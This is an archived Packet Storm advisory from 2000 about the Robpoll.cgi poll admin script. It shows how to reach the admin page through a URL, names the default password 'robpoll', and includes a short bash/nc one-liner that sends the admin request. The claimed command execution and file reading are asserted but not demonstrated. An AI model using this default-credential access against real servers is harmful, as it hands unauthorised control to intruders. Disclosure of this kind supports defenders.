what you don't know can hurt you

robpoll-cgi-problem.txt

robpoll-cgi-problem.txt
Posted Aug 9, 2000
Authored by Alt3kx | Site hertmx.org

Robpoll.cgi is a free cgi based admin program for Unix and NT which has remote vulnerabilities allowing remote users to execute any command on the remote system with the priveleges of the web server. In addition, anyone can read any file on the remote system with the webserver UID.

tags | exploit, remote, web, cgi, vulnerability
systems | unix
MD5 | 3ccc125dc142a7db49311a108150e833

robpoll-cgi-problem.txt

Change Mirror Download

Software: Robpoll.cgi
URL: http://
Platforms: Unix, NT
Type: CGI, Change password by default


robpoll.cgi Remote Possible Problem discovered by
Nick: alt3kx

Mail: alt3kx_h3z@raza-mexicana.org


Webs:

w w w . h e r t m x . o r g
w w w . s 0 d . o r g
w w w . r a z a - m e x i c a n a . o r g



Summary:

Anyone can execute any command on the remote system with
the priveleges of the web server. Anyone can read any file
on the remote system which the account in wich the webserver
runs as.


Vulnerability:

Robpoll is a free cgi based admin program.
I played with the CGI and discovered that the function admin
is set by a default password called "robpoll":

1: Add New Question
2: Remove Question
3: Change Password <--here is the bug


There is an admin function for adding and removing questions, which
is run through the robpoll.cgi, as shown in poll.html.

The admin section of the script is password protected. The default
password is "robpoll". You can change it through one of the admin
functions.


These are the files you should have:

1. robpoll.cgi . . . . . . the main Perl script
2. pollssi.cgi . . . . . . the Perl script for SSI
3. poll.html . . . . . . . sample html file
4. data.txt . . . . . . . . main data file
5. q1.txt . . . . . . . . . question data
6. ip1.txt . . . . . . . . ip data
7. num.txt . . . . . . . . data
8. white.jpg . . . . . . . image for graphing
9. robpoll.jpg . . . . . . link image
10. readme.txt . . . . . . . this file


Exploit:

(1) robpoll.cgi -

http://www.example.com/cgi-bin/robpoll.cgi?Admin

(2) You will receive an message html like:

1: Add New Question
2: Remove Question
3: Change Password

(3) The password by default is "robpoll", leaving this password thus
compromises the system and its files.


------------------------CUT------------------------

## - Author alt3kx -
## (www.raza-mexicana.org)
##
##
#!/bin/bash
echo -e "GET http://www.example.com/cgi-bin/robpoll.cgi?Admin
HTTP/1.0\n\n" | nc xxx.server.com 80



------------------------CUT------------------------



Greetz to: Packet Storm and Ken, ADM crew, dr_fdisk^(k00l friend),
Raregazz, X-ploit, _0x90_ (next work!).
Radikall (thanks for the work).










Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close